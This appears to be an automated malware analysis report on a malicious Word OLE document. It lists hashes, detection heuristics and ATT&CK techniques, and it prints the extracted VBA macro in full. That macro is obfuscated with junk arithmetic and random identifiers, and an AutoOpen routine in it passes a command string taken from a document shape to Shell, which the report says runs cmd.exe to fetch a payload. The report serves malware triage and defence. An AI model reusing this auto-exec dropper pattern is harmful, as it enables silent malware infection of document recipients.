Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8abe7bbc2c20b3f…

MALICIOUS

Office (OLE)

129.8 KB Created: 2018-12-06 16:36:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: f70f980bcf92cd7576ceabed143fb5f2 SHA-1: 4890982507b74486080dd5e907e22ec6a2256662 SHA-256: e8abe7bbc2c20b3fcdfa12f00f07d722ffcd905586bed2c07d1706a9abeef2b6
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic auto-exec macro ('autoopen') that triggers a critical VBA Shell() call. This call invokes cmd.exe with a highly obfuscated command line, indicating an attempt to download and execute a secondary payload. The complexity and obfuscation suggest a deliberate effort to evade detection.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6775170-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6775170-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    jWiuub = Array(DLiXGRbB, mEiRv, zbEWPVS, Interaction _
.Shell(hXhVhpKzMt, UUWEkHk), azEPSAcYn)
   iKltSrruiwiEJMrQ = 90492063 * CInt(212885405) + CALdnucPmXiiIcaLUusv + CLng(221203729 + Sgn(qFAUbUYqsZOjCJWjzwqc) - 34612878 * 152397626) - QZcjBWWUlwZKGcSTHqvfETbZ + Chr(oowuFEXTGkuwlWUVF) * 197021452 / CStr(241601944) / (zQDiijlJruwwCSMiZafr / 12837042 / AsXUVUbKzpqzQYkRQVTNbLn / Fix(vTKmvfztaIQLGJNRihvHHFBo + Hex(IJKXoPoFbZCJpOUrzWIHZLGI) + 10314825 + CBool(205901129 + QjoqRWonVnVmtbGfkLHtSaQ)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
kFmAWCjjE
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6512 bytes
SHA-256: 169ee4fbc13b8bc2eb367f02a841c94beb00dd0752a74d960f21f909683f1de2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
161 of 187 identifiers look randomly generated (e.g. 'HpSQKvqMbKXImBkmUdJzHzfw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sUsZzJZFINf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
kFmAWCjjE
End Sub

Attribute VB_Name = "VuXqItPV"
Function kFmAWCjjE()
On Error Resume Next
   KiVwVtaARDTBdzDiXTdvGHih = 153693002 * CInt(228708327) + PUXXCUqqlijYBwOpRDSZ + CLng(75235016 + Sgn(wZoAzrDzobnOLj) - 302083734 * 213592872) - hnHSEovczsRRiFITL + Chr(wjCVwnlpIlmkivkllmE) * 246134283 / CStr(289797546) / (sXzzliKWiuAIvzPLpUhOf / 62636521 / PKVjsUWPZfMqiVzBCfmHrk / Fix(AnWZwkDdFjhkpPBRCHi + Hex(cjGlqpSfjtCwfkVtWuZ) + 208175093 + CBool(144653769 + GGwlKlBNkzMJzQ)))
   FSimDwUowKMsIaJJj = 198269593 * CInt(204795844) + DhWquHuDmDVOEwDT + CLng(309248373 + Sgn(zQtZWjiNzscXrz) - 158000978 * 97931429) - XworwERCtownMXqO + Chr(jORdLpMhJBaOMYqpkfWG) * 72400571 / CStr(10108219) / (cXdsfZlVlJKRJwiM / 40847409 / KmDqnjQHzcrTHWiCpGi / Fix(jHXjoECGhsBTQiAPIljwbYcJ + Hex(RComHHbdIvCOXCjiJaEa) + 158505878 + CBool(20653961 + VPtEXmWHfOCWCOUZlaqI)))
   rVGjriCQGpwQvwaSfAwSUhGi = 175824604 * CInt(189161290) + YiSqMNqXEpECVFr + CLng(263914717 + Sgn(XRamzqzAMifKPbFOWdiowkDE) - 178972671 * 144195167) - awaMdsKGJCVbrSqziLMp + Chr(znwbJzznNVLbNZCm) * 147765334 / CStr(11592886) / (FVwLACqVIkYtOjPbK / 185979289 / TtMTvhKAdtnNIJujsCczZ / Fix(dpCpbwuwzsJmhYtCAi + Hex(BMcUXQkUwXYhiKAPWQGGNFf) + 315199232 + CBool(312196445 + VbVqqCwGXGBViY)))
   KdidsuCaHomvUALIrpcJnwAO = 252158759 * CInt(243536617) + NJuLVsEaDjHOKUKQFHQ + CLng(341047930 + Sgn(zRllwLINdTrHSp) - 111927859 * 87645607) - QDQZHbjaSpdjuGVlYQsI + Chr(ZhvNaNQHsitDbrNjipp) * 11337297 / CStr(73249423) / (WfjiNVWtZYEDqWULhOTT / 174616406 / kdSPIBuaCGOwKQhr / Fix(vkwFUwYArPSHairCMuDPzMUz + Hex(WwpuLDipPYjcEPfuORlbTbYX) + 299650346 + CBool(331508379 + dbBiPwHzAiGfMnRLKI)))
   CiwjRpvKuPlHQhabZa = 273216050 * CInt(242316673) + jlXRPQjoircClr + CLng(312399245 + Sgn(wnBzGiBcwGGGVEAv) - 65846676 * 122784124) - sbSCZPWMYIFfqiNdmo + Chr(zwjvUJJZTiqhsTVCmdlbik) * 145372394 / CStr(196085075) / (rbQcHbOHWUYJjzsPpD / 221148819 / bMLUbazBMENcFbchtzLDc / Fix(VwztGjsMsjowsfPvAjc + Hex(vSHwDEVLVsriEAqN) + 157979816 + CBool(226918612 + SIzMjnJizSwzibPiDr)))
Set CKhqzpKrr = sUsZzJZFINf.Shapes(CXRNJDvG + "zhdnjrBdZvI" + ItWXsXv).TextFrame
   bfOcvPvldnqFivlUmpHP = 147999557 * CInt(106526845) + IkbGWQjwDhNVAYMXoh + CLng(142458724 + Sgn(iKZVdJjqwmTILKGsUJY) - 137568060 * 303464514) - nYRalwaSSiArmwKFcMjszRO + Chr(KqSTCfIAirWBEDY) * 240504148 / CStr(107261962) / (TlHTXHhOjLlBrVJMPudG / 103230584 / ZAMvbIBYozcVwdzqTKmnww / Fix(dABssndGJOfLHHbjZ + Hex(IXlZVXjOZbTUbock) + 230888546 + CBool(308948544 + QJlKsSGSSpiriMaqZdE)))
   kzPYzEXSwilsiQtQ = 57151985 * CInt(20371090) + zEodvciGjZQCfirWhAY + CLng(52254586 + Sgn(zqGuijECRtPBwTHvTUv) - 121844498 * 333296637) - sifFNntMQkvwzOhjMsZDPjA + Chr(iKkaNjcpcIzYPc) * 147124316 / CStr(114034529) / (EdfGwTsNkHCsvbM / 221878975 / XCDTzkHFVrQJUkWIvKCU / Fix(jqrMcYZwhjlqkFTNpFtYAcc + Hex(EQXjjARJMjnLMGWLhIo) + 67930558 + CBool(204131526 + jiCuFFJwtGNPILBtMh)))
hXhVhpKzMt = CKhqzpKrr.ContainingRange + LKnwHuCp + AQqjz + oSwkhtdp + ASHBiih + usXXb + SvSXi + XmDbNK + Xtvwhiw + FjWXC + ZLoNCdbh
   IibiEzBbqzEcZaCBdM = 208337871 * CInt(69563605) + XiarGJFSjShaftozdWIou + CLng(264029527 + Sgn(HEtrXGUwDdokzAnwpvI) - 48374396 * 201003821) - BthODzpWWnjITnNRiM + Chr(ViwrIozpXTtmjvjCz) * 68197767 / CStr(62951942) / (UHjHBBqjAlYNws / 56695489 / ECZZGKRDcBCMjkNHYItOzpp / Fix(zQpmvfpnnrzzlkz + Hex(pciAwiwPYQonztvP) + 80614051 + CBool(118514159 + pUfIzLOZsnPWoLiYUKp)))
   ztaCotfaJKhpTJvaVpoFvWz = 285690530 * CInt(88257002) + TLuQWkaVYDqnjwdcmZzGIY + CLng(67855761 + Sgn(nIQtwatioBZUftozPzkrjiGq) - 183189529 * 123130091) - ZtGivBvcNTjZwJHwhZJws + Chr(AqKnSOECaRdqUphXdTkRb) * 194788042 / CStr(229065883) / (mhckYRSVrosQTIijXLs / 100271960 / HpSQKvqMbKXImBkmUdJzHzfw / Fix(DVkDtPkTdisJUOVbJ + Hex(iVHhHzuChjPnIKWwG) + 171479897 + CBool(40310531 + iumoJWscAPnXwkAa)))
   YOPwFjqbYYVcOJ = 4053466 * CInt(250051278) + tqbjJYHVirUWXGZcWltFvLtP + CLng(215934472 + Sgn(IadPsfSwUJBTOq) - 54523869 * 191420626) - rWEARvArYHjBiwMAIQj + Chr(OwpEbmQaDWDzSkBtcAqidXU) * 156690523 / CStr(251097092) / (mMpSGZbkMtjAZffZoCEiiwuT / 158867178 / aCPriRSjzDlkPdV / Fix(XIMbbKzDjRTDMoRWuzzZV + Hex(OPisfboDmaMBalGwfP) + 18022783 + CBool(76758045 + MwOTLlOqQdwMCuw)))
Const UUWEkHk = 0
   FzsSFXZNlwUuDIi = 42230494 * CInt(261588887) + XHXIYhrrwNJLsbwbp + CLng(53978401 + Sgn(KWzVZsVZlArwiahzklwYKbN) - 164174881 * 80371899) - aEtwcTWMduZmwP + Chr(HGqHQakKdNqskj) * 234479412 / CStr(54002887) / (IVSRjoYYaWznYwmjUDU / 154699266 / vdptPilamdtmBddzl / Fix(RRipEnXFPDLPfOkGNrd + Hex(QFmzotEBWUIjjcDFjGZ) + 12405310 + CBool(146547156 + TiOXziBuQmTNKLil)))
   zCQqqzdhqoQELA = 330296288 * CInt(157996333) + hWkCwpYziEltcXJEppVtFzn + CLng(223678779 + Sgn(KCuhYTBnwzlHABMrsHsso) - 96540041 * 114764076) - zWLciljjCQnmiQJ + Chr(jGdZYzooIBMqvpwvlnhCH) * 164093376 / CStr(54998902) / (OCFjNZNczGJhksiC / 221315227 / UdYsoMTsBqjHdKwQKW / Fix(FaioksojPKtFiUkEfoVOsPV + Hex(WsqdwjUhLKcwlpnAzjE) + 221168962 + CBool(53910058 + EntFTcpIzpFKRsCLhfqMu)))
jWiuub = Array(DLiXGRbB, mEiRv, zbEWPVS, Interaction _
.Shell(hXhVhpKzMt, UUWEkHk), azEPSAcYn)
   iKltSrruiwiEJMrQ = 90492063 * CInt(212885405) + CALdnucPmXiiIcaLUusv + CLng(221203729 + Sgn(qFAUbUYqsZOjCJWjzwqc) - 34612878 * 152397626) - QZcjBWWUlwZKGcSTHqvfETbZ + Chr(oowuFEXTGkuwlWUVF) * 197021452 / CStr(241601944) / (zQDiijlJruwwCSMiZafr / 12837042 / AsXUVUbKzpqzQYkRQVTNbLn / Fix(vTKmvfztaIQLGJNRihvHHFBo + Hex(IJKXoPoFbZCJpOUrzWIHZLGI) + 10314825 + CBool(205901129 + QjoqRWonVnVmtbGfkLHtSaQ)))
   qbrtCrdJFCzsmdndvP = 268723676 * CInt(275715473) + bEiBYkoPTCIbCPNiG + CLng(295219218 + Sgn(GijvwSTHBFuRPIG) - 96762535 * 153093603) - sdHptlzoRkNZwpW + Chr(jhuJjjFdmJZltSvAqVNO) * 8162357 / CStr(108100033) / (uwJBjtcGEujZZTOZJYiDjM / 92011724 / woMjdbHiTszMaiVjKCUqJtWh / Fix(vEpWNFiiNCujsddnEFj + Hex(BwbDusjrXmFSfHiWRH) + 40691792 + CBool(255285493 + iMfaDRZrDFnpNawdm)))
   IdVhPahJzSzHSj = 64814394 * CInt(173961588) + IGKNDuCvWozWADih + CLng(12390626 + Sgn(YIjCVssGJGnioA) - 259871782 * 56419910) - pKnEjSmsmhmzPTZQjlRdGlR + Chr(zkvHnAzjsKoWOvppuJ) * 228259978 / CStr(74798563) / (HumNSEOVfmDtSGz / 153188860 / ElhDGFiDCnwcjwCGPqpI / Fix(VvkNNYldwopSPEwdCApIKPR + Hex(tvqAmCQJOljqwptjt) + 168520458 + CBool(39725318 + GJTrFcNqAAiFdSURikqtYjDi)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.